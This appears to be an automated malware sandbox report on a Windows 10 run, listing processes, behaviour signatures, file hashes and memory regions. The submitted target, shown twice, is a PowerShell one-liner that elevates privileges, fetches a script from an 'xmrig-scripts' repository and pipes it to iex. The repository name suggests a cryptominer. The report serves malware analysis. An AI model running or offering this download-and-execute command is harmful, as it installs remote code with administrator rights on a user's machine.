Analysis

  • max time kernel
    316s
  • max time network
    1596s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    24/06/2024, 08:33

General

  • Target

    http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Malware Config

Signatures

  • Drops file in Windows directory 6 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\LaunchWinApp.exe
    "C:\Windows\system32\LaunchWinApp.exe" "http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex"
    1⤵
    • Access Token Manipulation: Create Process with Token
    PID:4520
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:252
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:3472
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4560
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:4704
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:3020
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4908
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    PID:3232
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    PID:4132
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:372
    • C:\Windows\system32\net.exe
      net localgroup Administrator
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1248
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 localgroup Administrator
        3⤵
          PID:3040

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\7863LXT4\favicon[2].png

            Filesize

            7KB

            MD5

            9e3fe8db4c9f34d785a3064c7123a480

            SHA1

            0f77f9aa982c19665c642fa9b56b9b20c44983b6

            SHA256

            4d755ac02a070a1b4bb1b6f1c88ab493440109a8ac1e314aaced92f94cdc98e9

            SHA512

            20d8b416bd34f3d80a77305c6fcd597e9c2d92ab1db3f46ec5ac84f5cc6fb55dfcdccd03ffdc5d5de146d0add6d19064662ac3c83a852f3be8b8f650998828d1

          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\AB5SU7FD\favicon[1].ico

            Filesize

            758B

            MD5

            84cc977d0eb148166481b01d8418e375

            SHA1

            00e2461bcd67d7ba511db230415000aefbd30d2d

            SHA256

            bbf8da37d92138cc08ffeec8e3379c334988d5ae99f4415579999bfbbb57a66c

            SHA512

            f47a507077f9173fb07ec200c2677ba5f783d645be100f12efe71f701a74272a98e853c4fab63740d685853935d545730992d0004c9d2fe8e1965445cab509c3

          • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

            Filesize

            4KB

            MD5

            1bfe591a4fe3d91b03cdf26eaacd8f89

            SHA1

            719c37c320f518ac168c86723724891950911cea

            SHA256

            9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

            SHA512

            02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

          • memory/252-16-0x000002E1C6220000-0x000002E1C6230000-memory.dmp

            Filesize

            64KB

          • memory/252-35-0x000002E1C33F0000-0x000002E1C33F2000-memory.dmp

            Filesize

            8KB

          • memory/252-337-0x000002E1C33C0000-0x000002E1C33C1000-memory.dmp

            Filesize

            4KB

          • memory/252-333-0x000002E1C52E0000-0x000002E1C52E1000-memory.dmp

            Filesize

            4KB

          • memory/252-330-0x000002E1C5340000-0x000002E1C5342000-memory.dmp

            Filesize

            8KB

          • memory/252-0-0x000002E1C6120000-0x000002E1C6130000-memory.dmp

            Filesize

            64KB

          • memory/252-151-0x000002E1CE6E0000-0x000002E1CE6E1000-memory.dmp

            Filesize

            4KB

          • memory/252-152-0x000002E1CE6F0000-0x000002E1CE6F1000-memory.dmp

            Filesize

            4KB

          • memory/3020-63-0x00000200FCEB0000-0x00000200FCEB2000-memory.dmp

            Filesize

            8KB

          • memory/3020-57-0x00000200FCCB0000-0x00000200FCCB2000-memory.dmp

            Filesize

            8KB

          • memory/3020-59-0x00000200FCCD0000-0x00000200FCCD2000-memory.dmp

            Filesize

            8KB

          • memory/3020-61-0x00000200FCCF0000-0x00000200FCCF2000-memory.dmp

            Filesize

            8KB

          • memory/3020-65-0x00000200FCED0000-0x00000200FCED2000-memory.dmp

            Filesize

            8KB

          • memory/3020-55-0x00000200FCC90000-0x00000200FCC92000-memory.dmp

            Filesize

            8KB

          • memory/3020-52-0x00000200EBE00000-0x00000200EBF00000-memory.dmp

            Filesize

            1024KB

          • memory/4908-101-0x0000022BBB040000-0x0000022BBB140000-memory.dmp

            Filesize

            1024KB

          • memory/4908-112-0x0000022BBBBA0000-0x0000022BBBBC0000-memory.dmp

            Filesize

            128KB

          • memory/4908-133-0x0000022BCCB60000-0x0000022BCCC60000-memory.dmp

            Filesize

            1024KB

          • memory/4908-139-0x0000022BBBF00000-0x0000022BBBF20000-memory.dmp

            Filesize

            128KB

          • memory/4908-98-0x0000022BAA8C0000-0x0000022BAA8E0000-memory.dmp

            Filesize

            128KB

          • memory/4908-74-0x0000022BAA680000-0x0000022BAA780000-memory.dmp

            Filesize

            1024KB